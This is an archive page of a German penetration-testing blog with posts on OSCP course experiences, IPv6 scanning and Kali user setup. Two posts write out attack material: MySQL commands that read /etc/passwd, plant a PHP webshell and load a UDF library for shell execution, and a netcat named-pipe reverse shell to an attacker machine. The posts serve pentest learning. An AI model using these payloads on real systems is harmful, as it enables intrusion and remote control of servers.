Pentest – Seite 3 – InfoSec Blog | Patrick Sauer & Dominik Sauer

Hacking MySQL: MySQL-Server als root

3. November 2013 by Patrick Sauer Leave a Comment

Dienste unnötigerweise als root bzw. mit maximalen Berechtigungen laufen zu lassen ist generell eine schlechte Idee. Besonders dämlich ist sie bei MySQL. Über LOAD_FILE und INTO OUTFILE stellt MySQL einem Angreifer ein paar praktische Möglichkeiten zur Verfügung, die sich auch problemlos über SQL Injections nutzen lassen:

SELECT LOAD_FILE(„/etc/passwd“);

SELECT ‚<?php system($_REQUEST[‚cmd‘]); ?>‘ INTO OUTFILE ‚/var/www/webshell.php

Diese beiden Funktionalitäten lassen zwar schon genug Schaden zu, es geht aber noch eine Stufe härter: Über MySQL User Defined Functions (UDF) lassen sich beliebige shell-Kommandos ausführen. Das Tool sqlmap beinhaltet die notwendigen Libs im Ordner udf. Die korrekte Lib auf den Server nach /tmp/ laden und aktivieren:

mysql> use mysql;

mysql> create table abc(line blob);

mysql> insert into abc values(load_file(‚/tmp/lib_mysqludf_sys.so‘));

mysql> select * from abc into dumpfile ‚/usr/lib/lib_mysqludf_sys.so‘;

mysql> create function sys_exec returns integer soname ‚lib_mysqludf_sys.so‘;

mysql> select sys_exec(‚touch /test‘);

Privilege escalation by MySQL…

Unprivilegierter User-Account in Kali Linux

31. Oktober 2013 by Patrick Sauer Leave a Comment

So direkt kann ich nicht nachvollziehen, warum Backtrack bzw. jetzt Kali Linux ihre Penetration Tester konsequent als root arbeiten lassen. Ein unprivilegierter User-Account und die Nutzung von sudo wären meiner Ansicht nach die bessere Wahl. Man benutzt schließlich als Sicherheitsspezialist eine Linux-Distribution, die genauso angegriffen werden kann wie man selbst Systeme angreift.

Einen lokalen Nutzer anlegen:

adduser localuser

usermod -G sudo localuser

Remote-Shell mit Netcat ohne „-e“ exec

28. Oktober 2013 by Patrick Sauer Leave a Comment

Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe:

kali# nc -nvlp 4444

host# mknod /tmp/pipe p

host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe

Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die Ausgabe von netcat in die Named Pipe umlenken. Fertig ist der Workaround..

Erfahrungen zum OSCP: Teil 5 Es zieht sich.

27. Oktober 2013 by Patrick Sauer Leave a Comment

Mein aktueller Stand:

5x privilegierte Rechte
6x unprivilegierte Rechte
Freischaltung DEV- und IT-Netz

Es zieht sich etwas. Das Labor ist enorm groß. Manchmal hat man eine gute Idee und ein wenig Glück, sodass eine Maschine schnell gerootet ist. Dafür rennt man bei anderen Maschinen Angriffsvektoren hinterher, die nicht zu funktionieren scheinen.

Es fühlt sich ein klein wenig an, als würde ich wieder eine wissenschaftliche Abschlussarbeit schreiben. Der OSCP ist sicherlich interessanter, keine Frage. Parallelen gibt es dennoch. Ohne Ausdauer und Ehrgeiz ist auch der OSCP nicht zu schaffen. Insbesondere wenn man noch recht am Anfang ist und mehr als die Hälfte noch vor sich hat.

Ich schätze, dass ich bis zum Ende mehr Zeit investieren werde, als für die Vorbereitungen auf CISSP, CISM, TISP usw. zusammen. Der OSCP bringt 40 CPE für CISSP und CISM – das ist ein lachhafter Wert. Wer den OSCP in 40 Stunden inklusive Prüfung und Dokumentation erfolgreich hinter sich bringt, hat meine Bewunderung verdient. Ich halte das für nahezu unmöglich.

Erfahrungen zum OSCP: Teil 4 Reverten tut gut

17. Oktober 2013 by Patrick Sauer Leave a Comment

Über das eigene Labpanel kann man beim OSCP Server in ihren Ausgangszustand zurückversetzen (reverten). Man kann zwar selbst jeden Tag nur eine begrenzte Anzahl von Servern reverten, dennoch lohnt es sich, dieses vor einem Angriff durchzuführen.

Andere OSCP-Studenten hinterlassen eventuell defekte Applikationen oder Files wie Webshells, die einen eigenen Angriff entweder beeinträchtigen können oder zumindest das Potential haben für Verwirrung zu sorgen.

Erfahrungen zum OSCP: Teil 3 Erste Bilanz

13. Oktober 2013 by Patrick Sauer Leave a Comment

Meine erste Bilanz:

1x Windows (privilegierte Rechte)
5x Linux (unprivilegierte Rechte)
Freischaltung DEV-Netz

Ich habe schon in vielen Berichten gelesen, wie steil die Lernkurve beim OSCP ist und wie umfangreich der Kurs. Jetzt kann ich es nachvollziehen. Es stimmt auch, dass der OSCP in keiner Art und Weise vergleichbar mit anderen Sicherheitszertifizierungen ist. Während man bei CISSP, CISM & Co sehr vieles einfach auswendig lernen kann, ist der OSCP absolut praktisch orientiert. Hier wird nichts auswendig gelernt, hier werden Anwendungen und Systeme gehackt. Über z.B. SQL Injections lesen ist die eine Sache, sie praktisch durchzuführen eine andere. Ich empfinde den OSCP bisher als recht anstrengend, aber auch als extrem lehrreich und fesselnd.

Kleiner Tipp am Rande: Wenn man über das eigene Adminpanel versucht einen Rechner zurückzusetzen und es scheint nicht zu funktionieren: Es ist eher kein Systemfehler sondern hat einen relativ einfachen Grund…

Erfahrungen zum OSCP: Teil 2 Die ersten Schritte

7. Oktober 2013 by Patrick Sauer Leave a Comment

Die Doku umfasst mehrere hundert Seiten und das Video-Material läuft auch länger als 5min. Ganz zu schweigen davon, dass die Übungen in der Doku auch ihre Zeit kosten. Etwas ungeduldig habe ich mich dann direkt am Labor versucht.

Das war ein Fehler. Ich habe einige Stunden für einen Angriff verschwendet, den ich nicht erfolgreich durchführen konnte. Danach bin ich zurück zur Doku. Auf Seite 305 stand dann auch der entscheidende Hinweis, wieso mein Angriff nicht funktionierte. Abkürzungen funktionieren beim OSCP nicht.

Meine Empfehlung: Doku überfliegen. Video sehen. Doku lesen und Übungen durchführen. Parallel vielleicht ein paar Scans (z.B. nmap oder nikto) gegen das Labor schießen, aber nicht blind drauflos hacken.

Erfahrungen zum OSCP: Teil 1 Der Start

5. Oktober 2013 by Patrick Sauer Leave a Comment

Ich habe mich für den Kurs Penetration Testing with BackTrack (PWB) angemeldet, der – sofern erfolgreich bestanden – mit dem Zertifikat Offensive Security Certified Professional (OSCP) abschließt. Nach einem Master in Security Management und Zertifikaten wie CISSP, CISM, T.I.S.P. usw. möchte ich etwas Neues wagen: Einen Einstieg in die Welt des Penetration Testing. Komplett neu ist sie für mich nicht. Ich habe u.a. einige Jahre Erfahrung im Bereich IT-Security, hatte schon einmal mit Backtrack experimentiert und einige Reports von Penetration Testern gelesen und bewertet. Worauf ich mich jetzt aber freue ist, mir selbst die Hände schmutzig machen zu dürfen.

Auf der Website vom offensive-security.com findet sich folgende passende Beschreibung für den Kurs:

Penetration Testing with BackTrack (PWB) is an online training course designed for network administrators and security professionals who need to acquaint themselves with the world of offensive information security. This penetration testing training introduces the latest hacking tools and techniques in the field and includes remote virtual penetration testing labs for practicing the course materials.Penetration Testing with BackTrack attempts to simulate a full penetration test, from start to finish, by injecting the student into a rich, diverse, and vulnerable network environment.

Ich habe bereits meine Zugangsdaten erhalten sowie alle Kursmaterialien: Eine PDF mit 337 Seiten, einiges an Videomaterial und VPN-Keys zum Labor. Ich bin gespannt auf die Erfahrung und werde hier berichten.

IPv6 ist das Ende vom Black Box Penetration Test

11. August 2013 by Patrick Sauer Leave a Comment

In einem gewöhnlichen IPv4-Netz existieren nicht sehr viele IP-Adressen. Ein paar Hundert. Vielleicht auch ein paar Tausend. Es ist relativ unproblematisch diese kleinen Mengen an möglichen Adressen innerhalb eines Netzwerks auf die Erreichbarkeit von verschiedenen Diensten zu prüfen. Für einen Black Box Penetration Test reicht es also aus, wenn der Penetration Tester nur den Netzbereich als Angriffsziel vom Auftraggeber mitgeteilt bekommt.

Dies ändert sich nun mit der Einführung von IPv6. Durch die hohe Anzahl von möglichen IP-Adressen innerhalb eines gewöhnlichen /64-Netzes ist es unmöglich einen kompletten Netzwerkscan eines einzelnen Netzes durchzuführen. Ein /64 umfasst 18.446.744.073.709.551.616 Adressen. Das sind mehr potentiell verwendete Adressen als es rechnerisch überhaupt ipv4-Adressen gibt. Es ist während eines Pentests unmöglich alle Adressen auch nur auf die Erreichbarkeit eines einzelnen Diensts zu prüfen. Da bei einem Black Box Penetration Test nur minimale Informationen über das Ziel bekannt sind, ist die Durchführung eines aussagekräftigen Tests bei ipv6 nicht mehr möglich. Es ist zwingend erforderlich, dass ein Penetration Tester eine exakte Auflistung aller aktiven Hosts bekommt.

IPv6 eschwehrt damit auch White Box oder Grey Box Penetration Testing: Welches Unternehmen verfügt wirklich über eine Dokumentation aller verwendeten IP-Adressen? Welche Aussagekraft besitzen Penetration Tests in IPv6-Netzen zukünftig überhaupt noch?